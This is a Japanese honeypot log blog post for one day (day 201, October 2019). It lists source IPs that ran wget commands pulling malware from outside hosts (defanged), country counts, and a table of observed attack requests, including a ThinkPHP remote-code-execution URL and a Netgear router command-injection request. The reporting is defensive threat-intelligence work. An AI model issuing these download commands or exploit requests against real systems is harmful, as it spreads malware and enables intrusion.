23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(201日目)

2019/10/03(木)

トータルは2474件でした。

ハンティングログは以下です。

123.128.152[.]21 wget+hxxp[:]//185.172.110[.]237/mipsel

www.virustotal.com

123.129.217[.]253 wget hxxp[:]//houmen[.]linux22[.]cn/houmen/linux223

www.virustotal.com

IPのロケーション別の件数は以下です。

フィンランド 2370
中国 29
アメリ 14
ブラジル 10
オランダ 5
インドネシア 5
フランス 4
イタリア 3
ウクライナ 2
ベルギー 2
ポルトガル 2
ウルグアイ 2
ノルウェー 2
トルコ 2
台湾 2
南アフリカ 2
ポーランド 1
ルーマニア 1
ブルガリア 1
イラン 1
シンガポール 1
カンボジア 1
韓国 1
コロンビア 1
ホンジュラス 1
ドイツ 1
ロシア 1
ハイチ 1
ベトナム 1
フィリピン 1
チェコ 1
ジャマイカ 1
インド 1

f:id:sec23:20191005232410p:plain

件数 概要 リクエス
2372 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
70 アクセス GET /
8 ログインページの調査 GET /Pages/login.htm
4 不明 POST /editBlackAndWhiteList
4 Servletの調査 GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
2 phpMyAdminの調査 GET /admin-scripts.asp
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 ユーザー情報調査 HEAD /adduser.php
1 不正中継の調査 GET hxxp[:]//www.baidu.com/
1 cfgファイル調査 GET /spa2102.cfg
1 Webshell設置の調査 GET /snom.php
1 DGN1000 Netgear ルータを狙うMirai亜種の攻撃 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 cfgファイル調 GET /prov/spa2102.cfg
1 調査 GET /is_test